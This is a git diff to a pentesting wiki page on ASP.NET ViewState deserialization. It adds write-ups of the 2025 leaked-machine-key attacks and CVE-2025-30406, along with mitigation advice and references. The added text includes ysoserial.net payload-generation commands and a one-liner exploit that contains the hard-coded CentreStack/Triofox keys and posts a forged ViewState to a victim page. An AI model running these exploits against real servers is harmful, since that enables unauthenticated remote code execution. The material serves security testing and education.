diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md index e7020f2a582..1d2efe9e0c2 100644 --- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md +++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md @@ -237,8 +237,50 @@ curl "http://victim/page.aspx?__VIEWSTATE=" This **key-exfiltration primitive** was mass-exploited against on-prem SharePoint servers in 2025 ("ToolShell" – CVE-2025-53770/53771), but it is applicable to any ASP.NET application where an attacker can run server-side code. +## 2024-2025 Real-world Exploitation Scenarios and Hard-coded Machine Keys + +### Microsoft “publicly disclosed machine keys” wave (Dec 2024 – Feb 2025) +Microsoft Threat Intelligence reported mass exploitation of ASP.NET sites where the *machineKey* had previously been leaked on public sources (GitHub gists, blog posts, paste sites). Adversaries enumerated these keys and generated valid `__VIEWSTATE` gadgets with the newer `ysoserial.net` 1.41 `--minify` and `--islegacy` flags to evade WAF length limits: + +```bash +ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" \ + --validationkey= --validationalg=SHA1 \ + --decryptionkey= --decryptionalg=AES \ + --generator= --minify +``` + +Rotating static keys or switching to *AutoGenerate* keys in Web .config (``) mitigates this class of attacks. {{#ref}} + +{{#endref}} + +### CVE-2025-30406 – Gladinet CentreStack / Triofox hard-coded keys +Kudelski Security uncovered that multiple CentreStack / Triofox releases shipped with identical `machineKey` values, enabling unauthenticated remote code execution through ViewState forgery (CVE-2025-30406). + +One-liner exploit: + +```bash +ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \ + --validationkey=ACC97055B2A494507D7D7C92DC1C854E8EA7BF4C \ + --validationalg=SHA1 \ + --decryptionkey=1FB1DEBB8B3B492390B2ABC63E6D1B53DC9CA2D7 \ + --decryptionalg=AES --generator=24D41AAB --minify \ + | curl -d "__VIEWSTATE=$(cat -)" http://victim/portal/loginpage.aspx +``` + +Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or replace the keys immediately. {{#ref}} + + +{{#endref}} + ## References +- [Exploiting ViewState deserialization using Blacklist3r and YSoSerial.NET](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/) +- [Deep dive into .NET ViewState deserialization and its exploitation](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817) +- [Exploiting deserialisation in ASP.NET via ViewState (Soroush Dalili, 2019)](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) +- [Introducing badsecrets – fast machineKey discovery](https://blog.blacklanternsecurity.com/p/introducing-badsecrets) +- [SharePoint “ToolShell” exploitation chain (Eye Security, 2025)](https://research.eye.security/sharepoint-under-siege/) +- [Microsoft Security – Code injection attacks abusing publicly disclosed ASP.NET machine keys (Feb 6 2025)](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/) +- [Kudelski Security advisory – Gladinet CentreStack / Triofox RCE CVE-2025-30406 (Apr 16 2025)](https://research.kudelskisecurity.com/2025/04/16/gladinet-centrestack-and-gladinet-triofox-critical-rce-cve-2025-30406/) - [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/) - [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817) - [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) @@ -250,4 +292,3 @@ This **key-exfiltration primitive** was mass-exploited against on-prem SharePoin {{#include ../../banners/hacktricks-training.md}} -